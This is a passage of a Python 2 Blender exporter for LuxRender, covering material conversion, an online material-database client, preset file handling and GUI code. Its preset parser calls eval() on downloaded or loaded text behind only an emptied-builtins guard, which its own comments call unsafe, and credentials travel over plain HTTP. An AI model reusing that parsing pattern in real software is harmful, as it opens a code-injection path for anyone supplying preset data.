            else: makeMirror(mirror1name)
        if mirror < 1.0:
            if mat.spec > 0.0: makeGlossy(mirror0name, 1.0/mat.hard)
            else: makeMatte(mirror0name)
    if alpha < 1.0:
        # NOTE(review): makeRoughnessGlass is not defined among the helpers
        # above — presumably a module-level helper elsewhere in this file; verify.
        if mat.glossTra < 1.0: makeRoughnessGlass(alpha0name, 1.0-mat.glossTra**2)
        else: makeGlass(alpha0name)
def convertAllMaterials():
    """Convert every Blender material in the file to a lux material."""
    for blender_mat in Material.Get():
        convertMaterial(blender_mat)
### Connect LRMDB ###
ConnectLrmdb = False
try:
import socket # try import of socket library
ConnectLrmdb = True
    # Download a material/texture definition from the online LRMDB by id.
    # Returns the parsed MatTex dictionary, or None on any failure.
    def downloadLRMDB(mat, id):
        if id.isalnum():
            DrawProgressBar(0.0,'Getting Material #'+id)
            try:
                # plain HTTP/1.0 GET over a raw socket (keeps dependencies minimal)
                HOST = 'www.luxrender.net'
                GET = '/lrmdb/en/material/download/'+id
                PORT = 80
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.connect((HOST, PORT))
                # NOTE(review): socket.send may transmit only part of the
                # request; sendall would be safer — confirm before changing.
                sock.send("GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (GET, HOST))
                data = sock.recv(1024)
                str = ""
                while len(data):
                    str += data
                    data = sock.recv(1024)
                sock.close()
                # expect a "200" status somewhere in the first response line
                if str.split("\n", 1)[0].find("200") < 0:
                    print("ERROR: server error: %s"%(str.split("\n",1)[0]))
                    return None
                # body follows the blank line; a serialized MatTex is "{...}"
                str = (str.split("\r\n\r\n")[1]).strip()
                if (str[0]=="{") and (str[-1]=="}"):
                    return str2MatTex(str)
                print("ERROR: downloaded data is not a material or texture")
            except:
                print("ERROR: download failed")
            DrawProgressBar(1.0,'')
        else:
            print("ERROR: material id is not valid")
        return None
#===========================================================================
# COOKIETRANSPORT
#===========================================================================
#---------------------------------------------------------------------------
# IMPORTS
import cookielib, urllib2, xmlrpclib
#---------------------------------------------------------------------------
# pilfered from
# https://fedorahosted.org/python-bugzilla/browser/bugzilla.py?rev=e6f699f06e92b1e49b1b8d2c8fbe89d9425a4a9a
    class CookieTransport(xmlrpclib.Transport):
        '''
        A subclass of xmlrpclib.Transport that supports cookies.
        '''
        cookiejar = None   # lazily-created cookielib.CookieJar shared across requests
        scheme = 'http'    # used to reconstruct the request URL for cookie matching
        verbose = None
        # Cribbed from xmlrpclib.Transport.send_user_agent
        def send_cookies(self, connection, cookie_request):
            '''
            Send all the cookie data that we have received
            '''
            if self.cookiejar is None:
                # first request: start with an empty jar (nothing to send yet)
                self.cookiejar = cookielib.CookieJar()
            elif self.cookiejar:
                # Let the cookiejar figure out what cookies are appropriate
                self.cookiejar.add_cookie_header(cookie_request)
            # Pull the cookie headers out of the request object...
            cookielist = list()
            for header, value in cookie_request.header_items():
                if header.startswith('Cookie'):
                    cookielist.append([header, value])
            # ...and put them over the connection
            for header, value in cookielist:
                connection.putheader(header, value)
        # This is the same request() method from xmlrpclib.Transport,
        # with a couple additions noted below
        def request(self, host, handler, request_body, verbose=0):
            '''
            Handle the request
            '''
            host_connection = self.make_connection(host)
            if verbose:
                host_connection.set_debuglevel(1)
            # ADDED: construct the URL and Request object for proper cookie handling
            request_url = "%s://%s/" % (self.scheme, host)
            cookie_request = urllib2.Request(request_url)
            self.send_request(host_connection, handler, request_body)
            self.send_host(host_connection, host)
            # ADDED. creates cookiejar if None.
            self.send_cookies(host_connection, cookie_request)
            self.send_user_agent(host_connection)
            self.send_content(host_connection, request_body)
            errcode, errmsg, headers = host_connection.getreply()
            # ADDED: parse headers and get cookies here
            class CookieResponse:
                '''
                fake a response object that we can fill with the headers above
                '''
                def __init__(self, headers):
                    self.headers = headers
                def info(self):
                    return self.headers
            cookie_response = CookieResponse(headers)
            # Okay, extract the cookies from the headers
            self.cookiejar.extract_cookies(cookie_response, cookie_request)
            # And write back any changes
            # DH THIS DOESN'T WORK
            # self.cookiejar.save(self.cookiejar.filename)
            if errcode != 200:
                raise xmlrpclib.ProtocolError(
                    host + handler,
                    errcode, errmsg,
                    headers
                    )
            self.verbose = verbose
            try:
                sock = host_connection._conn.sock
            except AttributeError:
                sock = None
            return self._parse_response(host_connection.getfile(), sock)
#===========================================================================
# LRMDB Integration
#===========================================================================
    class lrmdb:
        """Thin client for the LRMDB material database XML-RPC service."""
        host = 'http://www.luxrender.net/lrmdb/ixr'
        username = ""
        password = ""
        logged_in = False       # True after a successful user.login call
        SERVER = None           # lazily-created xmlrpclib.ServerProxy
        last_error_str = None   # human-readable reason of the last failure
        def last_error(self):
            # return the last recorded error message (or None)
            return self.last_error_str #'LRMDB Connector: %s' %
        def login(self):
            # authenticate against the server; sets self.logged_in
            try:
                result = self.SERVER.user.login(
                    self.username,
                    self.password
                )
                if not result:
                    raise
                else:
                    self.logged_in = True
                    return True
            except:
                self.last_error_str = 'Login Failed'
                self.logged_in = False
                return False
        def submit_object(self, mat, basekey, tex):
            # upload a material (tex=False) or texture (tex=True) definition;
            # returns True on success, False otherwise (see last_error())
            if not self.check_creds(): return False
            try:
                result = 'Unknown Error'
                if tex:
                    # textures have no intrinsic name; ask the user for one
                    name = Draw.PupStrInput('Name: ', '', 32)
                else:
                    name = mat.name
                result = self.SERVER.object.submit(
                    name,
                    MatTex2dict( getMatTex(mat, basekey, tex), tex )
                )
                if result is not True:
                    raise
                else:
                    return True
            except:
                self.last_error_str = 'Submit failed: %s' % result
                return False
        def check_creds(self):
            # make sure we have a server proxy and a valid login,
            # prompting the user for credentials when necessary
            if self.SERVER is None:
                try:
                    self.SERVER = xmlrpclib.ServerProxy(self.host, transport=CookieTransport())
                except:
                    self.last_error_str = 'ServerProxy init failed'
                    return False
            if not self.logged_in:
                #if self.username is "":
                self.request_username()
                #if self.password is "":
                self.request_password()
                return self.login()
            else:
                return True
        def request_username(self):
            self.username = Draw.PupStrInput("Username:", self.username, 32)
        def request_password(self):
            self.password = Draw.PupStrInput("Password:", self.password, 32)
lrmdb_connector = lrmdb()
except: print("WARNING: LRMDB support not available")
### MatTex functions ###
### MatTex : is a dictionary of material or texture properties
def getMatTex(mat, basekey='', tex=False):
    """Collect the lux properties of `mat` into a plain dict ("MatTex").

    Runs luxMaterial() with the module-global `usedproperties` capture
    enabled, then keeps only the captured keys that start with `basekey`
    (the prefix is stripped from the stored key). Keys ending in
    '.textured' are dropped. A '__type__' entry of 'material' or
    'texture' (per `tex`) is added.
    """
    global usedproperties, usedpropertiesfilterobj
    # luxMaterial() records every property it touches into usedproperties
    # when usedpropertiesfilterobj matches the material being drawn.
    usedproperties = {}
    usedpropertiesfilterobj = mat
    luxMaterial(mat)
    dict = {}  # NOTE(review): shadows the builtin `dict`; kept for compatibility
    for k,v in usedproperties.items():
        if k[:len(basekey)]==basekey:
            if k[-9:] != '.textured':
                name = k[len(basekey):]
                # the bare type key loses its leading dot in the exported dict
                if name == ".type": name = "type"
                dict[name] = v
    dict["__type__"] = ["material","texture"][bool(tex)]
    return dict
def putMatTex(mat, dict, basekey='', tex=None):
    """Apply a MatTex property dict (from getMatTex/str2MatTex) onto `mat`.

    Refuses to apply a texture dict as a material or vice versa (checked
    via the '__type__' entry when `tex` is not None). Existing properties
    under `basekey` are deleted first, then the loaded key/value pairs are
    written back through luxProp().
    """
    # XOR guard: tex flag must agree with the dict's declared '__type__'.
    if dict and (tex!=None) and (tex ^ (dict.has_key("__type__") and (dict["__type__"]=="texture"))):
        print("ERROR: Can't apply %s as %s"%(["texture","material"][bool(tex)],["material","texture"][bool(tex)]))
        return
    if dict:
        # remove all current properties in mat that starts with basekey
        try:
            d = mat.properties['pbrtblend']
            for k,v in d.convert_to_pyobject().items():
                kn = k
                if k[:7]=="__hash:":    # decode if entry is hashed (cause of 32chars limit)
                    l = v.split(" = ")
                    kn = l[0]
                if kn[:len(basekey)]==basekey:
                    del mat.properties['pbrtblend'][k]
        except: print("error")  # NOTE(review): swallows all errors; presumably fine when no props exist yet
        # assign loaded properties
        for k,v in dict.items():
            try:
                if (basekey!="") and (k=="type"): k = ".type"
                # zuegs: following two lines should fix issue http://www.luxrender.net/forum/viewtopic.php?f=16&t=1618&p=14512#p14512
                if (basekey!="") and ((k[0]!=".") and (k[0]!=":")): k = ":"+k
                if (basekey=="") and (k[0:4]==":mat"): k = k[1:]
                luxProp(mat, basekey+k, None).set(v)
                # a '.texture' entry implies the corresponding '.textured' toggle
                if k[-8:] == '.texture':
                    luxProp(mat, basekey+k[:-8]+'.textured', 'false').set('true')
            except: pass
# Serialization format version for LBM/LBT preset files.
LBX_VERSION = '0.7'

def MatTex2dict(d, tex = None):
    """Convert a MatTex property dict into the LBX on-disk dict layout.

    For LBX 0.6 the dict is tagged in place with LUX_DATA/LUX_VERSION and
    returned (mutates `d`!). For LBX 0.7 a new dict is built with a typed
    'definition' list of [type, key, value] triples plus metadata.
    """
    global LBX_VERSION
    if LBX_VERSION == '0.6':
        if tex is not None and tex == True:
            d['LUX_DATA'] = 'TEXTURE'
        else:
            d['LUX_DATA'] = 'MATERIAL'
        d['LUX_VERSION'] = '0.6'
        return d
    elif LBX_VERSION == '0.7':
        definition = []
        for k in d.keys():
            # Python-2 type tagging; a string of exactly three space-separated
            # parts is treated as a vector.
            # NOTE(review): if a value matches none of these types, `t` keeps
            # its value from the previous iteration (or is unbound on the
            # first one) — confirm all stored values are int/float/bool/str.
            if type(d[k]) == types.IntType:
                t = 'integer'
            if type(d[k]) == types.FloatType:
                t = 'float'
            if type(d[k]) == types.BooleanType:
                t = 'bool'
            if type(d[k]) == types.StringType:
                l=None
                try:
                    l = d[k].split(" ")
                except: pass
                if l==None or len(l)!=3:
                    t = 'string'
                else:
                    t = 'vector'
            definition.append([ t, k, d[k] ])
        lbx = {
            'type': d['__type__'],
            'version': '0.7',
            'definition': definition,
            'metadata': [
                ['string', 'generator', 'pbrtblend'],
            ]
        }
        return lbx
def format_dictStr(dictStr):
    """Pretty-print a repr()'d dict/list string with newlines and indentation.

    Walks the string character by character: after ',', '{' and '[' a
    newline plus the current indentation is inserted ('{'/'[' also deepen
    the indent); before '}' and ']' the indent is reduced and a newline
    inserted. No attempt is made to skip quoted strings, so separators
    inside string values are formatted too (same as the original).

    Fix: accumulate parts in a list and join once instead of repeated
    string '+=' (which is quadratic on large inputs).
    """
    parts = []
    indentStr = '    '
    newLine = '\n'
    pos = 0  # current nesting depth
    for char in dictStr:
        if char in ('}', ']'):
            parts.append(newLine)
            pos -= 1
            # negative depth multiplies to '' — matches the original's empty range()
            parts.append(indentStr * pos)
        parts.append(char)
        if char in (',', '{', '['):
            parts.append(newLine)
            if char in ('{', '['):
                pos += 1
            parts.append(indentStr * pos)
    return ''.join(parts)
def MatTex2str(d, tex = None):
    """Serialize a MatTex dict to its pretty-printed LBX string form.

    Returns None implicitly for an unknown LBX_VERSION, exactly as the
    original version-by-version branches did (both branches produced the
    same expression, so they are collapsed into one membership test).
    """
    global LBX_VERSION
    if LBX_VERSION in ('0.6', '0.7'):
        return format_dictStr(str(MatTex2dict(d, tex)))
def str2MatTex(s, tex = None):  # todo: this is not absolutely save from attacks!!!
    """Parse a stored LBM/LBT string back into a MatTex property dict.

    SECURITY: uses eval() on file/clipboard content. __builtins__ is
    emptied, which blocks trivial attacks but is not a real sandbox —
    only load presets from trusted sources.

    Returns the parsed dict on success; prints an error and returns None
    on any validation failure.
    """
    global LBX_VERSION
    s = s.strip()
    if (s[0]=='{') and (s[-1]=='}'):
        # restrict eval's globals to keep builtins out of reach
        d = eval(s, dict(__builtins__=None))
        if type(d)==types.DictType:
            if LBX_VERSION == '0.6':
                if tex is not None and tex == True:
                    test_str = 'TEXTURE'
                else:
                    test_str = 'MATERIAL'
                # 0.6 files carry LUX_DATA / LUX_VERSION tags in the dict itself
                if ('LUX_DATA' in d.keys() and d['LUX_DATA'] == test_str) \
                and ('LUX_VERSION' in d.keys() and (d['LUX_VERSION'] == '0.6' or d['LUX_VERSION'] == 0.6)):
                    return d
                else:
                    reason = 'Missing/incorrect metadata'
            elif LBX_VERSION == '0.7':
                def lb_list_to_dict(list):
                    # [type, key, value] triples -> {key: value}; floats are coerced
                    d = {}
                    for t, k, v in list:
                        if t == 'float':
                            v = float(v)
                        d[k] = v
                    return d
                if ('version' in d.keys() and d['version'] in ['0.6', '0.7']) \
                and ('type' in d.keys() and d['type'] in ['material', 'texture']) \
                and ('definition' in d.keys()):
                    try:
                        definition = lb_list_to_dict(d['definition'])
                        if 'metadata' in d.keys():
                            definition.update( lb_list_to_dict(d['metadata']) )
                        return definition
                    except:
                        reason = 'Incorrect LBX definition data'
                else:
                    reason = 'Missing/incorrect metadata'
            else:
                reason = 'Unknown LBX version'
        else:
            reason = 'Not a parsed dict'
    else:
        reason = 'Not a stored dict'
    print("ERROR: string to material/texture conversion failed: %s" % reason)
    return None
luxclipboard = None # global variable for copy/paste content

def showMatTexMenu(mat, basekey='', tex=False):
    """Show the material/texture popup menu and dispatch the chosen action.

    Menu entries: copy/paste via the luxclipboard global, load/save LBM/LBT
    preset files, and (when ConnectLrmdb is enabled) download from / upload
    to the online LRMDB database.
    """
    global luxclipboard, ConnectLrmdb
    if tex: menu="Texture menu:%t"
    else: menu="Material menu:%t"
    menu += "|Copy%x1"
    try:
        # paste only offered when clipboard content type matches tex/material
        if luxclipboard and (not(tex) ^ (luxclipboard["__type__"]=="texture")): menu +="|Paste%x2"
    except: pass
    if (tex):
        menu += "|Load LBT%x3|Save LBT%x4"
    else:
        menu += "|Load LBM%x3|Save LBM%x4"
    if ConnectLrmdb:
        menu += "|Download from DB%x5" #not(tex) and
        menu += "|Upload to DB%x6"
    # menu += "|%l|dump material%x99|dump clipboard%x98"
    r = Draw.PupMenu(menu)
    if r==1:
        luxclipboard = getMatTex(mat, basekey, tex)
    elif r==2: putMatTex(mat, luxclipboard, basekey, tex)
    elif r==3:
        scn = Scene.GetCurrent()
        if (tex):
            Window.FileSelector(lambda fn:loadMatTex(mat, fn, basekey, tex), "load texture", luxProp(scn, "lux", "").get()+os.sep+".lbt")
        else:
            Window.FileSelector(lambda fn:loadMatTex(mat, fn, basekey, tex), "load material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
    elif r==4:
        scn = Scene.GetCurrent()
        if (tex):
            Window.FileSelector(lambda fn:saveMatTex(mat, fn, basekey, tex), "save texture", luxProp(scn, "lux", "").get()+os.sep+".lbt")
        else:
            Window.FileSelector(lambda fn:saveMatTex(mat, fn, basekey, tex), "save material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
    elif r==5:
        if not tex:
            id = Draw.PupStrInput("Material ID:", "", 32)
        else:
            id = Draw.PupStrInput("Texture ID:", "", 32)
        if id: putMatTex(mat, downloadLRMDB(mat, id), basekey, tex)
    elif r==6:
        global lrmdb_connector
        if not lrmdb_connector.submit_object(mat, basekey, tex):
            msg = lrmdb_connector.last_error()
        else:
            msg = 'OK'
        Draw.PupMenu("Upload: "+msg+".%t|OK")
    # elif r==99:
    #     for k,v in mat.properties['pbrtblend'].convert_to_pyobject().items(): print(k+"="+repr(v))
    # elif r==98:
    #     for k,v in luxclipboard.items(): print(k+"="+repr(v))
    #     prin()
    Draw.Redraw()
def saveMatTex(mat, fn, basekey='', tex=False):
    """Save the material/texture properties of `mat` to preset file `fn`.

    Serializes via getMatTex() + MatTex2str() and writes the result.
    Fix: use a `with` block so the file handle is closed even when
    serialization or the write raises (the original leaked it on error).
    """
    global LuxIsGUI
    d = getMatTex(mat, basekey, tex)
    with open(fn, 'w') as file:
        file.write(MatTex2str(d, tex))
    if LuxIsGUI: Draw.Redraw()
def loadMatTex(mat, fn, basekey='', tex=None):
    """Load a material/texture preset from file `fn` and apply it to `mat`.

    Reads the file, parses it with str2MatTex() and applies the result via
    putMatTex(). Fix: use a `with` block so the file handle is closed even
    when read() raises (the original leaked it on error).
    """
    global LuxIsGUI
    with open(fn, 'r') as file:
        data = file.read()
    data = str2MatTex(data, tex)
    putMatTex(mat, data, basekey, tex)
    if LuxIsGUI: Draw.Redraw()
# Material currently being edited in the GUI (None until one is selected).
activemat = None

def setactivemat(mat):
    """Remember `mat` as the GUI's currently edited material."""
    global activemat
    activemat = mat
# scrollbar
class scrollbar:
    """Vertical scrollbar for the script window, drawn with raw BGL calls.

    Tracks the scroll `position` (top offset into the content), the total
    content `height` and the visible `viewHeight`; Mouse() implements
    click-and-drag on the slider.
    """
    def __init__(self):
        self.position = 0 # current position at top (inside 0..height-viewHeight)
        self.height = 0 # total height of the content
        self.viewHeight = 0 # height of window
        self.x = 0 # horizontal position of the scrollbar
        self.scrolling = self.over = False # start without scrolling ;)
    def calcRects(self):
        """Recompute window, track and slider rectangles from the GL scissor box."""
        # Blender doesn't give us direct access to the window size yet, but it does set the
        # GL scissor box for it, so we can get the size from that. (thx to Daniel Dunbar)
        size = BGL.Buffer(BGL.GL_FLOAT, 4)
        BGL.glGetFloatv(BGL.GL_SCISSOR_BOX, size)
        size = size.list # [winx, winy, width, height]
        self.winrect = size[:]
        self.viewHeight = size[3]
        size[0], size[1] = size[2]-20, 0 # [scrollx1, scrolly1, scrollx2, scrolly2]
        self.rect = size[:]
        # clamp position into the valid 0..height-viewHeight range
        if self.position < 0: self.position = 0
        if self.height < self.viewHeight: self.height = self.viewHeight
        if self.position > self.height-self.viewHeight: self.position = self.height-self.viewHeight
        self.factor = (size[3]-size[1]-4)/self.height
        self.sliderRect = [size[0]+2, size[3]-2-(self.position+self.viewHeight)*self.factor, size[2]-2, size[3]-2-self.position*self.factor]
    def draw(self):
        """Draw the track and the slider (highlighted while hovered/dragging)."""
        self.calcRects()
        BGL.glColor3f(0.5,0.5,0.5); BGL.glRectf(self.rect[0],self.rect[1],self.rect[2],self.rect[3])
        if self.over or self.scrolling: BGL.glColor3f(1.0,1.0,0.7)
        else: BGL.glColor3f(0.7,0.7,0.7)
        BGL.glRectf(self.sliderRect[0],self.sliderRect[1],self.sliderRect[2],self.sliderRect[3])
    def getTop(self):
        """Return the content y-coordinate of the top of the visible area."""
        return self.viewHeight+self.position
    def scroll(self, delta):
        """Scroll by `delta` content units (clamped by calcRects) and redraw."""
        self.position = self.position + delta
        self.calcRects()
        Draw.Redraw()
    def Mouse(self):
        """Handle mouse-move events: hover highlighting and slider dragging."""
        self.calcRects()
        coord, buttons = Window.GetMouseCoords(), Window.GetMouseButtons()
        over = (coord[0]>=self.winrect[0]+self.rect[0]) and (coord[0]<=self.winrect[0]+self.rect[2]) and \
            (coord[1]>=self.winrect[1]+self.rect[1]) and (coord[1]<=self.winrect[1]+self.rect[3])
        if Window.MButs.L and buttons > 0:
            if self.scrolling:
                # convert pixel delta to content delta via the slider factor
                if self.factor > 0: self.scroll((self.lastcoord[1]-coord[1])/self.factor)
                Draw.Redraw()
            elif self.over:
                self.scrolling = True
            # NOTE(review): indentation reconstructed — lastcoord is updated on
            # every event while the button is down, so drag deltas stay relative
            self.lastcoord = coord
        elif self.scrolling:
            self.scrolling = False
            Draw.Redraw()
        if self.over != over: Draw.Redraw()
        self.over = over

# NOTE(review): rebinding the class name to its single instance — the class
# itself is unreachable after this line.
scrollbar = scrollbar()
# gui main draw
def luxDraw():
    """Draw the whole LuxBlend GUI (registered as the Draw.Register draw callback).

    Renders the preset selector, the tab bar, the page selected by the
    scene 'page' property (0=Material, 1=Cam/Env, 2=Render, 3=Output,
    4=System), the export buttons/toggles and finally the scrollbar.
    """
    global icon_luxblend
    BGL.glClear(BGL.GL_COLOR_BUFFER_BIT)
    y = int(scrollbar.getTop()) # 420
    BGL.glColor3f(0.1,0.1,0.1); BGL.glRectf(0,0,440,y)
    BGL.glColor3f(1.0,0.5,0.0); BGL.glRasterPos2i(130,y-21); Draw.Text("v0.6")
    BGL.glColor3f(0.9,0.9,0.9)
    # drawLogo(icon_luxblend, 6, y-25)
    scn = Scene.GetCurrent()
    if scn:
        luxpage = luxProp(scn, "page", 0)
        gui = luxGui(y-70)
        # render presets
        BGL.glRasterPos2i(10,y-45); Draw.Text("Render presets:")
        luxpreset = luxProp(scn, "preset", "1C - Final - medium MLT/Path Tracing (indoor) (recommended)")
        presets = getScenePresets()
        presetskeys = presets.keys()
        presetskeys.sort()
        presetskeys.insert(0, "")
        presetsstr = "presets: %t"
        for i, v in enumerate(presetskeys): presetsstr = "%s %%x%d|%s"%(v, i, presetsstr)
        try: i = presetskeys.index(luxpreset.get())
        except ValueError: i = 0
        Draw.Menu(presetsstr, evtLuxGui, 110, y-50, 220, 18, i, "", lambda e,v: luxpreset.set(presetskeys[v]))
        Draw.Button("save", evtSavePreset, 330, y-50, 40, 18, "create a render-settings preset")
        Draw.Button("del", evtDeletePreset, 370, y-50, 40, 18, "delete a render-settings preset")
        # if preset is selected load values
        if luxpreset.get() != "":
            try:
                d = presets[luxpreset.get()]
                for k,v in d.items(): scn.properties['pbrtblend'][k] = v
            except: pass
        # tab bar buttons (each sets the 'page' property)
        Draw.Button("Material", evtLuxGui, 10, y-70, 80, 16, "", lambda e,v:luxpage.set(0))
        Draw.Button("Cam/Env", evtLuxGui, 90, y-70, 80, 16, "", lambda e,v:luxpage.set(1))
        Draw.Button("Render", evtLuxGui, 170, y-70, 80, 16, "", lambda e,v:luxpage.set(2))
        Draw.Button("Output", evtLuxGui, 250, y-70, 80, 16, "", lambda e,v:luxpage.set(3))
        Draw.Button("System", evtLuxGui, 330, y-70, 80, 16, "", lambda e,v:luxpage.set(4))
        if luxpage.get() == 0:
            # Material page (orange underline marks the active tab)
            BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(10,y-74,90,y-70);BGL.glColor3f(0.9,0.9,0.9)
            obj = scn.objects.active
            if obj:
                if (obj.getType() == "Lamp"):
                    ltype = obj.getData(mesh=1).getType() # data
                    if (ltype == Lamp.Types["Area"]): luxLight("Area LIGHT", "", obj, gui, 0)
                    elif (ltype == Lamp.Types["Spot"]): luxSpot("Spot LIGHT", "", obj, gui, 0)
                    elif (ltype == Lamp.Types["Lamp"]): luxLamp("Point LIGHT", "", obj, gui, 0)
                else:
                    matfilter = luxProp(scn, "matlistfilter", "false")
                    mats = getMaterials(obj, True)
                    if (activemat == None) and (len(mats) > 0):
                        setactivemat(mats[0])
                    if matfilter.get() == "false":
                        mats = Material.Get()
                    matindex = 0
                    for i, v in enumerate(mats):
                        if v==activemat: matindex = i
                    matnames = [m.getName() for m in mats]
                    menustr = "Material: %t"
                    for i, v in enumerate(matnames): menustr = "%s %%x%d|%s"%(v, i, menustr)
                    gui.newline("MATERIAL:", 8)
                    r = gui.getRect(1.1, 1)
                    Draw.Button("C", evtConvertMaterial, r[0]-gui.h, gui.y-gui.h, gui.h, gui.h, "convert blender material to lux material")
                    Draw.Menu(menustr, evtLuxGui, r[0], r[1], r[2], r[3], matindex, "", lambda e,v: setactivemat(mats[v]))
                    luxBool("", matfilter, "filter", "only show active object materials", gui, 0.5)
                    Draw.Button("L", evtLoadMaterial, gui.x, gui.y-gui.h, gui.h, gui.h, "load a material preset")
                    Draw.Button("S", evtSaveMaterial, gui.x+gui.h, gui.y-gui.h, gui.h, gui.h, "save a material preset")
                    Draw.Button("D", evtDeleteMaterial, gui.x+gui.h*2, gui.y-gui.h, gui.h, gui.h, "delete a material preset")
                    if len(mats) > 0:
                        setactivemat(mats[matindex])
                        luxMaterial(activemat, gui)
        if luxpage.get() == 1:
            # Camera / Environment page
            BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(90,y-74,170,y-70);BGL.glColor3f(0.9,0.9,0.9)
            cam = scn.getCurrentCamera()
            if cam:
                r = gui.getRect(1.1, 1)
                luxCamera(cam.data, scn.getRenderingContext(), gui)
            gui.newline("", 10)
            luxEnvironment(scn, gui)
        if luxpage.get() == 2:
            # Render settings page
            BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(170,y-74,250,y-70);BGL.glColor3f(0.9,0.9,0.9)
            r = gui.getRect(1.1, 1)
            luxSampler(scn, gui)
            gui.newline("", 10)
            luxRenderer(scn, gui)
            gui.newline("", 10)
            luxSurfaceIntegrator(scn, gui)
            gui.newline("", 10)
            luxVolumeIntegrator(scn, gui)
            gui.newline("", 10)
            luxPixelFilter(scn, gui)
        if luxpage.get() == 3:
            # Output (film) page
            BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(250,y-74,330,y-70);BGL.glColor3f(0.9,0.9,0.9)
            r = gui.getRect(1.1, 1)
            luxFilm(scn, gui)
        if luxpage.get() == 4:
            # System page
            BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(330,y-74,410,y-70);BGL.glColor3f(0.9,0.9,0.9)
            luxSystem(scn, gui)
            gui.newline("", 10)
            gui.newline("MATERIALS:", 10)
            r = gui.getRect(2,1)
            Draw.Button("convert all blender materials", 0, r[0], r[1], r[2], r[3], "convert all blender-materials to lux-materials", lambda e,v:convertAllMaterials())
            gui.newline("SETTINGS:", 10)
            r = gui.getRect(2,1)
            Draw.Button("save defaults", 0, r[0], r[1], r[2], r[3], "save current settings as defaults", lambda e,v:saveluxdefaults())
        y = gui.y - 80
        if y > 0: y = 0 # bottom align of render button
        # export option properties
        run = luxProp(scn, "run", "true")
        dlt = luxProp(scn, "default", "true")
        pipe = luxProp(scn, "pipe", "false")
        clay = luxProp(scn, "clay", "false")
        nolg = luxProp(scn, "nolg", "false")
        lxs = luxProp(scn, "lxs", "true")
        lxo = luxProp(scn, "lxo", "true")
        lxm = luxProp(scn, "lxm", "true")
        lxv = luxProp(scn, "lxv", "true")
        global render_status_text
        global render_status
        if render_status == True:
            BGL.glRasterPos2i(10,y+20)
            Draw.Text(render_status_text)
        else:
            BGL.glRasterPos2i(10,y+5)
            Draw.Text(render_status_text, "tiny")
        def check_pipe_def_exclusion(m, v):
            # 'def' (write default lxs) and 'pipe' (write no lxs) are mutually exclusive toggles
            if m == 'd':
                dlt.set(["false","true"][bool(v)])
                if dlt.get() == 'true':
                    pipe.set('false')
            elif m == 'p':
                pipe.set(["false","true"][bool(v)])
                if pipe.get() == 'true':
                    dlt.set('false')
        if False: # (run.get()=="true"):
            Draw.Button("Render", 0, 10, y+20, 100, 36, "Render with Lux", lambda e,v:CBluxExport(dlt.get()=="true" or pipe.get()=="true", True))
            Draw.Button("Render Anim", 0, 110, y+20, 100, 36, "Render animation with Lux", lambda e,v:CBluxAnimExport(dlt.get()=="true" or pipe.get()=="true", True))
        else:
            Draw.Button("Export", 0, 10, y+20, 100, 36, "Export", lambda e,v:CBluxExport(dlt.get()=="true" or pipe.get()=="true", False))
            Draw.Button("Export Anim", 0, 110, y+20, 100, 36, "Export animation", lambda e,v:CBluxAnimExport(dlt.get()=="true" or pipe.get()=="true", False))
        # Draw.Toggle("run", evtLuxGui, 265, y+40, 30, 16, run.get()=="true", "start Lux after export", lambda e,v: run.set(["false","true"][bool(v)]))
        if (pipe.get() == 'false' and dlt.get() == 'true') or run.get()=='false':
            Draw.Toggle("def", evtLuxGui, 295, y+40, 55, 16, dlt.get()=="true", "write to default lxs file", lambda e,v: check_pipe_def_exclusion('d',v))
        elif pipe.get() == 'true' and dlt.get() == 'false':
            Draw.Toggle("pipe", evtLuxGui, 295, y+40, 55, 16, pipe.get()=="true", "do not write any lxs file", lambda e,v: check_pipe_def_exclusion('p',v))
        else:
            Draw.Toggle("def", evtLuxGui, 295, y+40, 25, 16, dlt.get()=="true", "write to default lxs file", lambda e,v: check_pipe_def_exclusion('d',v))
            Draw.Toggle("pipe", evtLuxGui, 320, y+40, 30, 16, pipe.get()=="true", "do not write any lxs file", lambda e,v: check_pipe_def_exclusion('p',v))
        Draw.Toggle("clay", evtLuxGui, 350, y+40, 30, 16, clay.get()=="true", "all materials are rendered as white-matte", lambda e,v: clay.set(["false","true"][bool(v)]))
        Draw.Toggle("noLG", evtLuxGui, 380, y+40, 35, 16, nolg.get()=="true", "disables all light groups", lambda e,v: nolg.set(["false","true"][bool(v)]))
        if pipe.get() == "false":
            Draw.Toggle("main", 0, 265, y+20, 37, 16, lxs.get()=="true", "export scene file", lambda e,v: lxs.set(["false","true"][bool(v)]))
            Draw.Toggle("geom", 0, 302, y+20, 38, 16, lxo.get()=="true", "export geometry file", lambda e,v: lxo.set(["false","true"][bool(v)]))
            Draw.Toggle("mat", 0, 340, y+20, 37, 16, lxm.get()=="true", "export material file", lambda e,v: lxm.set(["false","true"][bool(v)]))
            Draw.Toggle("vol", 0, 377, y+20, 38, 16, lxv.get()=="true", "export volume file", lambda e,v: lxv.set(["false","true"][bool(v)]))
        BGL.glColor3f(0.9, 0.9, 0.9)
        BGL.glRasterPos2i(330,y+5) ; Draw.Text("Press Q or ESC to quit.", "tiny")
    scrollbar.height = scrollbar.getTop() - y
    scrollbar.draw()
# --- GUI module state ---
render_status_text = ''  # status line shown near the bottom of the GUI
render_status = False    # True while a render/export is in progress
mouse_xr=1
mouse_yr=1
activeObject = None      # last seen active object (to detect selection changes)
activeEvent = None       # key-triggered action currently running ('RKEY'/'EKEY'/'PKEY')
lastEventTime = 0        # timestamp of the last key-triggered action (5s rate limit)
# Number keys 1..5 select the five GUI tab pages.
key_tabs = {
    Draw.ONEKEY: 0,
    Draw.TWOKEY: 1,
    Draw.THREEKEY: 2,
    Draw.FOURKEY: 3,
    Draw.FIVEKEY: 4,
}
def luxEvent(evt, val): # function that handles keyboard and mouse events
    """Draw.Register event callback: quit keys, scrolling, shortcut keys.

    Q/ESC ask to quit; mouse/page keys drive the scrollbar; R/E/P trigger
    render/export/preview (rate-limited via activeEvent/lastEventTime);
    number keys switch tab pages.
    """
    global activeObject, activemat, activeEvent, lastEventTime, key_tabs
    if evt == Draw.ESCKEY or evt == Draw.QKEY:
        stop = Draw.PupMenu("OK?%t|Cancel export %x1")
